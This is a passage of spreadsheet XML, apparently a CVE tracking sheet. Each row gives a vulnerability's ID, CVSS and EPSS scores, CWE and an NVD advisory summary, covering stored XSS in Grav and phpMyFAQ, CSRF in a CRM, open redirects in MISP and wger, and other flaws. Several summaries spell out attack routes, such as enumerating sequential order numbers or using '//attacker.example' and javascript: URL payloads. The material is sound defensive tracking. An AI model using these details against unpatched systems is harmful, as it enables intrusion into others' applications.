        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82069</t>
        </is>
      </c>
    </row>
    <row r="5381">
      <c r="A5381" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5381" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82881</t>
        </is>
      </c>
      <c r="C5381" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5381" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5381" s="5" t="inlineStr"/>
      <c r="F5381" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5381" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5381" s="5" t="inlineStr"/>
      <c r="I5381" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J5381" s="5" t="inlineStr"/>
      <c r="K5381" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5381" s="5" t="inlineStr">
        <is>
          <t>Aix-DB through 1.2.4 renders markdown with raw HTML enabled into v-html bindings without sanitization, allowing stored cross-site scripting attacks. Attackers can inject malicious HTML and JavaScript through markdown content in chat responses, skill descriptions, or knowledge messages that execute in users' browsers when viewed.</t>
        </is>
      </c>
      <c r="M5381" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82881</t>
        </is>
      </c>
    </row>
    <row r="5382">
      <c r="A5382" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5382" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82911</t>
        </is>
      </c>
      <c r="C5382" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5382" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5382" s="5" t="inlineStr"/>
      <c r="F5382" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5382" s="5" t="inlineStr"/>
      <c r="H5382" s="5" t="inlineStr"/>
      <c r="I5382" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5382" s="5" t="inlineStr"/>
      <c r="K5382" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="L5382" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) in the OrderConfirmController at GET /order/confirm/{order_number} in Roskus Prospero Flow CRM before 5.15.11 allows an unauthenticated attacker to confirm any order on behalf of an authenticated user by directing them to a crafted page. Laravel's VerifyCsrfToken middleware enforces CSRF tokens only on POST, PUT, PATCH, and DELETE requests; the Route::get declaration leaves this state-changing action unprotected. Session cookies configured with SameSite=Lax are automatically included in top-level cross-site navigation, so a single link click triggers OrderConfirmController::confirm() and transitions the target order from pending to confirmed without user authorization. Because order numbers are sequential integers, an attacker can enumerate and confirm all existing orders in a single automated sweep.</t>
        </is>
      </c>
      <c r="M5382" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82911</t>
        </is>
      </c>
    </row>
    <row r="5383">
      <c r="A5383" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5383" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84305</t>
        </is>
      </c>
      <c r="C5383" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5383" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5383" s="5" t="inlineStr"/>
      <c r="F5383" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5383" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H5383" s="5" t="inlineStr"/>
      <c r="I5383" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5383" s="5" t="inlineStr"/>
      <c r="K5383" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L5383" s="5" t="inlineStr">
        <is>
          <t>sqlparse is a non-validating SQL parser module for Python. Prior to 0.6.0, sqlparse.format(sql, reindent=True) and sqlformat --reindent route attacker-controlled parenthesized tuple lists through ReindentFilter._get_offset() in sqlparse/filters/reindent.py, where _flatten_up_to_token() repeatedly rebuilds and joins the statement prefix. Thousands of offset calculations walk an expanding token tree, producing quadratic CPU consumption for inputs that remain below MAX_GROUPING_TOKENS and causing request delays, reduced throughput, or worker starvation. This issue is fixed in version 0.6.0.</t>
        </is>
      </c>
      <c r="M5383" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84305</t>
        </is>
      </c>
    </row>
    <row r="5384">
      <c r="A5384" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5384" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84386</t>
        </is>
      </c>
      <c r="C5384" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5384" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5384" s="5" t="inlineStr"/>
      <c r="F5384" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5384" s="5" t="inlineStr">
        <is>
          <t>windows, fortinet</t>
        </is>
      </c>
      <c r="H5384" s="5" t="inlineStr"/>
      <c r="I5384" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5384" s="5" t="inlineStr"/>
      <c r="K5384" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L5384" s="5" t="inlineStr">
        <is>
          <t>A unverified ownership vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.7, FortiClientWindows 7.2 all versions may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="M5384" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84386</t>
        </is>
      </c>
    </row>
    <row r="5385">
      <c r="A5385" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5385" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84477</t>
        </is>
      </c>
      <c r="C5385" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5385" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5385" s="5" t="inlineStr"/>
      <c r="F5385" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5385" s="5" t="inlineStr"/>
      <c r="H5385" s="5" t="inlineStr"/>
      <c r="I5385" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J5385" s="5" t="inlineStr"/>
      <c r="K5385" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5385" s="5" t="inlineStr">
        <is>
          <t>AVideo Live_schedule::setTitle() and setDescription() store POST input without sanitization, allowing users with streaming permission to inject malicious scripts. Unauthenticated attackers can access remindMe.php to execute stored XSS payloads in victim browsers without requiring authentication.</t>
        </is>
      </c>
      <c r="M5385" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84477</t>
        </is>
      </c>
    </row>
    <row r="5386">
      <c r="A5386" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5386" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84967</t>
        </is>
      </c>
      <c r="C5386" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5386" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5386" s="5" t="inlineStr"/>
      <c r="F5386" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5386" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H5386" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="I5386" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J5386" s="5" t="inlineStr"/>
      <c r="K5386" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L5386" s="5" t="inlineStr">
        <is>
          <t>A component of the MongoDB extension for Visual Studio Code does not neutralize special characters in a connection string before that value is placed into a command line the extension composes for an integrated terminal. An unauthenticated remote unauthorized-user who persuades a developer to accept a user-supplied connection target, and then to open the extension's shell feature, can place characters of the unauthorized-user’s choosing into that command line. No privileges on the developer's machine are required, but several user actions are. The confirmation the developer sees does not display the supplied text.</t>
        </is>
      </c>
      <c r="M5386" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84967</t>
        </is>
      </c>
    </row>
    <row r="5387">
      <c r="A5387" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5387" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85593</t>
        </is>
      </c>
      <c r="C5387" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5387" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5387" s="5" t="inlineStr"/>
      <c r="F5387" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5387" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5387" s="5" t="inlineStr"/>
      <c r="I5387" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5387" s="5" t="inlineStr"/>
      <c r="K5387" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5387" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ versions before 4.1.8 contain a stored cross-site scripting vulnerability in FaqHelper::convertOldInternalLinks() that calls html_entity_decode() on sanitized FAQ content, reversing entity-encoding protection. Authenticated users with FAQ editing privileges can inject JavaScript payloads that execute in the browsers of all users viewing the affected FAQ pages.</t>
        </is>
      </c>
      <c r="M5387" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85593</t>
        </is>
      </c>
    </row>
    <row r="5388">
      <c r="A5388" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5388" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85598</t>
        </is>
      </c>
      <c r="C5388" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5388" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5388" s="5" t="inlineStr"/>
      <c r="F5388" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5388" s="5" t="inlineStr"/>
      <c r="H5388" s="5" t="inlineStr"/>
      <c r="I5388" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5388" s="5" t="inlineStr"/>
      <c r="K5388" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5388" s="5" t="inlineStr">
        <is>
          <t>Grav versions 2.0.0 through 2.0.17 fail to apply save-time XSS detection to modular pages, allowing authenticated page editors to store Twig-assembled XSS payloads. Attackers with page-edit rights can create modular pages with malicious Twig code that executes in visitor browsers when the parent page is rendered, including in administrator sessions.</t>
        </is>
      </c>
      <c r="M5388" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85598</t>
        </is>
      </c>
    </row>
    <row r="5389">
      <c r="A5389" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5389" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85599</t>
        </is>
      </c>
      <c r="C5389" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5389" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5389" s="5" t="inlineStr"/>
      <c r="F5389" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5389" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5389" s="5" t="inlineStr"/>
      <c r="I5389" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5389" s="5" t="inlineStr"/>
      <c r="K5389" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5389" s="5" t="inlineStr">
        <is>
          <t>Grav Shortcode Core before 6.2.5 contains stored cross-site scripting vulnerabilities in the [lorem] tag parameter and [details] summary parameter that are written to rendered pages without escaping. Attackers with page-edit access can inject arbitrary HTML and JavaScript that executes in the browsers of all page visitors, including administrators.</t>
        </is>
      </c>
      <c r="M5389" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85599</t>
        </is>
      </c>
    </row>
    <row r="5390">
      <c r="A5390" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5390" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85600</t>
        </is>
      </c>
      <c r="C5390" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5390" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5390" s="5" t="inlineStr"/>
      <c r="F5390" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5390" s="5" t="inlineStr"/>
      <c r="H5390" s="5" t="inlineStr"/>
      <c r="I5390" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5390" s="5" t="inlineStr"/>
      <c r="K5390" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5390" s="5" t="inlineStr">
        <is>
          <t>Grav Admin (getgrav/grav-plugin-admin2) versions &lt;= 2.0.19 contain a stored cross-site scripting vulnerability in the tHtml() function (src/lib/stores/i18n.svelte.ts), which substitutes untrusted parameters such as usernames into translation templates before parsing the result as markdown. Grav's server-side username validation (DataUser::isValidUsername) blocks filesystem-dangerous characters but not &lt;, &gt;, ", or ', allowing an attacker to register a username containing an HTML payload. When an administrator views a UI surface that renders the username through tHtml()—such as the two-factor force-disable confirmation prompt or the 'page is locked' editor notice—the payload executes in their authenticated session. Fixed in 2.0.21.</t>
        </is>
      </c>
      <c r="M5390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85600</t>
        </is>
      </c>
    </row>
    <row r="5391">
      <c r="A5391" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85601</t>
        </is>
      </c>
      <c r="C5391" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5391" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5391" s="5" t="inlineStr"/>
      <c r="F5391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5391" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5391" s="5" t="inlineStr"/>
      <c r="I5391" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5391" s="5" t="inlineStr"/>
      <c r="K5391" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5391" s="5" t="inlineStr">
        <is>
          <t>Grav Admin before 2.0.20 fails to sanitize output from marked.parse() before injecting it into the DOM via Svelte's {@html} directive in MarkdownEditor and MarkdownModal components. Attackers can inject javascript: URI schemes in plugin or theme changelogs to execute arbitrary code in authenticated admin sessions without requiring site access.</t>
        </is>
      </c>
      <c r="M5391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85601</t>
        </is>
      </c>
    </row>
    <row r="5392">
      <c r="A5392" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85781</t>
        </is>
      </c>
      <c r="C5392" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5392" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5392" s="5" t="inlineStr"/>
      <c r="F5392" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5392" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H5392" s="5" t="inlineStr"/>
      <c r="I5392" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J5392" s="5" t="inlineStr"/>
      <c r="K5392" s="5" t="inlineStr">
        <is>
          <t>CWE-283</t>
        </is>
      </c>
      <c r="L5392" s="5" t="inlineStr">
        <is>
          <t>Unverified ownership of a storage access point in the volume deletion component of the Amazon EFS CSI Driver before v3.4.1 might allow an authenticated Kubernetes user with PersistentVolume creation privileges to cause recursive deletion of directories on an EFS filesystem they are not authorized to access, via a crafted PersistentVolume volumeHandle that pairs an access point from one filesystem with a different target filesystem.
To remediate this issue, users should upgrade to version v3.4.1.</t>
        </is>
      </c>
      <c r="M5392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85781</t>
        </is>
      </c>
    </row>
    <row r="5393">
      <c r="A5393" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86085</t>
        </is>
      </c>
      <c r="C5393" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5393" s="5" t="inlineStr"/>
      <c r="F5393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5393" s="5" t="inlineStr"/>
      <c r="H5393" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="I5393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5393" s="5" t="inlineStr"/>
      <c r="K5393" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L5393" s="5" t="inlineStr">
        <is>
          <t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the /rest/roles/:slug/assignments and /rest/roles/:slug/assignments/:projectId/members endpoints checked only whether the caller could manage the role type. A caller with role:manageProject could name a project the caller could not list and obtain member names and email addresses. The affected controller is packages/cli/src/controllers/role.controller.ts, which omitted the project:list scope check. This issue is fixed in versions 2.37.7 and 2.38.2.</t>
        </is>
      </c>
      <c r="M5393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86085</t>
        </is>
      </c>
    </row>
    <row r="5394">
      <c r="A5394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86197</t>
        </is>
      </c>
      <c r="C5394" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5394" s="5" t="inlineStr"/>
      <c r="F5394" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5394" s="5" t="inlineStr"/>
      <c r="H5394" s="5" t="inlineStr"/>
      <c r="I5394" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J5394" s="5" t="inlineStr"/>
      <c r="K5394" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5394" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.20 contains a cross-site scripting vulnerability in the Twig sandbox policy that allowlists addJs and addCss methods on Grav\Common\Assets without proper output escaping. Page editors can inject arbitrary script by registering malicious assets or injecting attributes, which are rendered unescaped into document head tags and executed for all visitors including administrators.</t>
        </is>
      </c>
      <c r="M5394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86197</t>
        </is>
      </c>
    </row>
    <row r="5395">
      <c r="A5395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86256</t>
        </is>
      </c>
      <c r="C5395" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5395" s="5" t="inlineStr"/>
      <c r="F5395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5395" s="5" t="inlineStr"/>
      <c r="H5395" s="5" t="inlineStr"/>
      <c r="I5395" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J5395" s="5" t="inlineStr"/>
      <c r="K5395" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5395" s="5" t="inlineStr">
        <is>
          <t>wger before 2.6 (affected versions &lt;= 2.5.0) contains an open redirect vulnerability in the trainer_login view (wger/core/views/user.py). After a trainer enters impersonation mode, the view redirects to the user-supplied 'next' GET parameter via HttpResponseRedirect() without validating it with url_has_allowed_host_and_scheme(). An attacker who delivers a crafted link to an authenticated trainer can redirect the trainer's browser to an attacker-controlled domain, enabling phishing and leaking the wger URL structure (including the impersonated user's user_pk) via the Referer header.</t>
        </is>
      </c>
      <c r="M5395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86256</t>
        </is>
      </c>
    </row>
    <row r="5396">
      <c r="A5396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86351</t>
        </is>
      </c>
      <c r="C5396" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5396" s="5" t="inlineStr"/>
      <c r="F5396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5396" s="5" t="inlineStr"/>
      <c r="H5396" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5396" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5396" s="5" t="inlineStr"/>
      <c r="K5396" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-601</t>
        </is>
      </c>
      <c r="L5396" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP validate the user-configurable homepage by checking only whether the supplied path begins with /. That check is insufficient because protocol-relative URLs such as //attacker.example also begin with / but resolve to an external origin in browsers.
The vulnerable homepage value can be stored as a user setting and later used by the post-login routing logic. The commit explicitly identifies //attacker.example as a payload that passed validation and was emitted to the Location header after login.
The fix introduces a shared InternalRedirectValidator that rejects URLs containing a host, scheme, userinfo, unsafe leading // or /\, malformed URLs, and control characters. It also revalidates homepage settings on read so legacy or internally written unsafe values cannot bypass the new storage-time validation.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86351</t>
        </is>
      </c>
    </row>
    <row r="5397">
      <c r="A5397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86440</t>
        </is>
      </c>
      <c r="C5397" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5397" s="5" t="inlineStr"/>
      <c r="F5397" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5397" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5397" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I5397" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5397" s="5" t="inlineStr"/>
      <c r="K5397" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="L5397" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP insufficiently validate URLs used by dashboard widgets, particularly the Button widget.
The widget's URL is stored configuration controlled by a user. The previous renderer considered a URL safe if it appeared relative or if its parsed hostname matched the configured MISP hostname. That logic failed to reject dangerous schemes and URL forms that browsers normalize differently from PHP's URL parsing.
As a result, values such as javascript: URLs or backslash-based authority forms could reach the generated anchor's href and execute script or navigate to an attacker-controlled origin when another user interacted with the widget. The upstream commit describes the issue as:
“javascript: and backslash URLs reached the href (stored XSS)”.
The fix routes widget URLs through a shared DashboardURLValidator, rejects dangerous schemes, raw backslashes, control characters, and unauthorized absolute origins, and validates the URL both in the widget handler and renderer.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M5397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86440</t>
        </is>
      </c>
    </row>
    <row r="5398">
      <c r="A5398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86516</t>
        </is>
      </c>
      <c r="C5398" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5398" s="5" t="inlineStr"/>
      <c r="F5398" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5398" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H5398" s="5" t="inlineStr"/>
      <c r="I5398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5398" s="5" t="inlineStr"/>
      <c r="K5398" s="5" t="inlineStr">
        <is>
          <t>CWE-266, CWE-269</t>
        </is>
      </c>
      <c r="L5398" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in elenavanengelenmaslova mocknest-serverless 0.9.0. The affected element is an unknown function of the file deployment/aws/shared/github-oidc-role.yaml of the component AWS GitHub OIDC Deployment Helper Script. Performing a manipulation results in improper privilege management. It is possible to initiate the attack remotely. The patch is named 6ab3147282d867c1993f995272750db091c2290b. Applying a patch is the recommended action to fix this issue.</t>
        </is>
      </c>
      <c r="M5398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86516</t>
        </is>
      </c>
    </row>
    <row r="5399">
      <c r="A5399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86740</t>
        </is>
      </c>
      <c r="C5399" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5399" s="5" t="inlineStr"/>
      <c r="F5399" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5399" s="5" t="inlineStr"/>
      <c r="H5399" s="5" t="inlineStr"/>
      <c r="I5399" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5399" s="5" t="inlineStr"/>
      <c r="K5399" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="L5399" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT before 8.7.0 fails to check the return value of Storage::delete() in UploadedFilesController::destroy() and Api\\UploadedFilesController::destroy(), allowing deletion requests to report success while files remain on disk. Administrators performing attachment deletions receive success responses and see files hidden from listings, but the physical files persist on disk and remain accessible to anyone with filesystem or backup access.</t>
        </is>
      </c>
      <c r="M5399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86740</t>
        </is>
      </c>
    </row>
    <row r="5400">
      <c r="A5400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86742</t>
        </is>
      </c>
      <c r="C5400" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D5400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5400" s="5" t="inlineStr"/>
      <c r="F5400" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5400" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5400" s="5" t="inlineStr"/>
      <c r="I5400" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5400" s="5" t="inlineStr"/>
      <c r="K5400" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L5400" s="5" t="inlineStr">
        <is>
